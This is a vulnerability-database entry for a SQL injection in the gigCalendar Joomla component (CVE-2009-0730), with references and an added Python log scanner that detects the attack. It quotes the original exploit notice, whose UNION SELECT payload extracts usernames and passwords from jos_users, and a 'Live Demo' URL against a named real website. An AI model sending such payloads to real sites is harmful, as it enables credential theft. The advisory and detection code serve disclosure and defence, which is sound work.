Gigcalendar SQL Injection Vulnerability

Vulnerability ID 1117260  Vulnerability Type SQL Injection
Published 2009-01-18  Updated 2009-06-23
CVE ID CVE-2009-0730  CNNVD-ID CNNVD-200902-687
Platform PHP  CVSS Score 6.8
|Sources
https://www.exploit-db.com/exploits/7815
https://cxsecurity.com/issue/WLB-2009020274
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-687
|Vulnerability Details
gigCalendar is a free Joomla! and Mambo component for maintaining tour dates (gigs) on a website. The gigCalendar (com_gigcal) component for Mambo and Joomla! contains multiple SQL injection vulnerabilities. When magic_quotes_gpc is disabled, a remote attacker can execute arbitrary SQL commands via (1) the gigcal_venues_id parameter in a details action to index.php, which venuedetails.php does not properly sanitize, and (2) the gigcal_bands_id parameter in a details action to index.php, which banddetails.php does not properly sanitize. Note that the magic_quotes_gpc qualifier is weaker than it sounds: the vulnerable parameters are used in a numeric context, and the published exploit below contains no quote characters at all (it builds the username:password separator with char(58)), so addslashes()-style escaping would leave it unchanged.
|Exploit
*****************************************************************************
*                                                                           *
*           Joomla Component Gigcal SQL Injection Vulnerability             *
*                                                                           *
*****************************************************************************

***************************************
[=] Vulnerability found by: Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site: www.khg-crew.ws
[=] Greetz: boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , SpYrO
[=]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
***************************************
[=] Exploit  : /index.php?option=com_gigcal&Itemid=78&id={SQL}
[=] Example  : /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
[=] Live Demo: http://www.fermaten.dk/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
***************************************
[=] Proud 2 be Albanian
[=] Proud 2 be Muslim
[=] United States of Albania
***************************************

# milw0rm.com [2009-01-18]
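The advisory above gives the injection as a URL; what a defender usually has is the web server's access log. The following is an added example (not part of the original advisory, and not gigCalendar or Joomla! code) that scans constructed combined-format access-log lines for requests to com_gigcal whose id parameter is not a plain integer, which is the only shape a valid venue/band id should have, and extracts the UNION/FROM target when present. It also renders PHP's addslashes(), which is what magic_quotes_gpc applied to request values, to show that the published quote-free payload passes through it unchanged. The IP addresses, timestamps and log lines are constructed; the second line carries the PoC query string from the advisory verbatim, and the detection heuristics are this example's own, not a published signature.

```python
"""Flag UNION-based SQL injection attempts against the com_gigcal 'id'
parameter in Apache/Nginx combined-format access logs, and check how
magic_quotes_gpc (PHP addslashes) would have treated the payload.

Added example: log lines are constructed, heuristics are our own."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (combined format). Line 2 is the advisory's PoC
# query string; line 3 is a URL-encoded variant; line 4 targets another
# component and is deliberately outside this check's scope.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jan/2009:10:01:02 +0000] "GET /index.php?option=com_gigcal&Itemid=78&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jan/2009:10:01:07 +0000] "GET /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/* HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jan/2009:10:01:09 +0000] "GET /index.php?option=com_gigcal&Itemid=78&id=-999%20UNION%20SELECT%201,2,3%20FROM%20jos_users%23 HTTP/1.1" 200 6011 "-" "curl/7.19"
203.0.113.7 - - [18/Jan/2009:10:02:00 +0000] "GET /index.php?option=com_content&task=view&id=-1+union+select+1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
FROM_RE = re.compile(r"\bfrom\s+([A-Za-z_][\w.]*)", re.I)


def inspect_gigcal_request(target):
    """Return a finding dict for a com_gigcal request whose id is not a
    plain integer, else None. parse_qs decodes %xx and '+' for us."""
    query = parse_qs(urlsplit(target).query)
    if query.get("option", [""])[0] != "com_gigcal":
        return None
    ids = query.get("id")
    if not ids:
        return None
    raw = ids[0]
    # A legitimate gig/venue/band id is an integer; anything else reaches
    # the unsanitized query in the vulnerable component.
    if re.fullmatch(r"-?\d+", raw.strip()):
        return None
    table = FROM_RE.search(raw)
    return {
        "id": raw,
        "union_select": UNION_RE.search(raw) is not None,
        "table": table.group(1) if table else None,
    }


def scan_log(text):
    """Parse each log line and collect findings with source ip/ts/status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_gigcal_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"),
                           status=int(m.group("status")))
            findings.append(finding)
    return findings


def magic_quotes_gpc(value):
    """PHP addslashes(): backslash-escape ' " \\ and NUL. This is all
    magic_quotes_gpc did to GET/POST/COOKIE values."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} "
              f"union={f['union_select']} table={f['table']}")
        # The PoC survives addslashes() untouched: it never uses a quote.
        print("  unchanged by magic_quotes_gpc:", magic_quotes_gpc(f["id"]) == f["id"])
```

Running it reports the two 203.0.113.9 requests, both resolving to the jos_users table, and confirms that addslashes() leaves each payload byte-for-byte identical. The com_content line is ignored on purpose: the option filter keeps the check tied to this component, and widening it to every Joomla! id parameter is a one-line change once you have established a baseline.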
|References

Source: XF
Name: gigcalendar-venuedetails-sql-injection(48865)
Link: http://xforce.iss.net/xforce/xfdb/48865
Source: BID
Name: 33863
Link: http://www.securityfocus.com/bid/33863
Source: BID
Name: 33859
Link: http://www.securityfocus.com/bid/33859
Source: BUGTRAQ
Name: 20090221 gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/501176/100/0/threaded
Source: BUGTRAQ
Name: 20090221 gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/501175/100/0/threaded
Source: BUGTRAQ
Name: 20090221 gigCalendar Joomla Component 1.0 SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/501174/100/0/threaded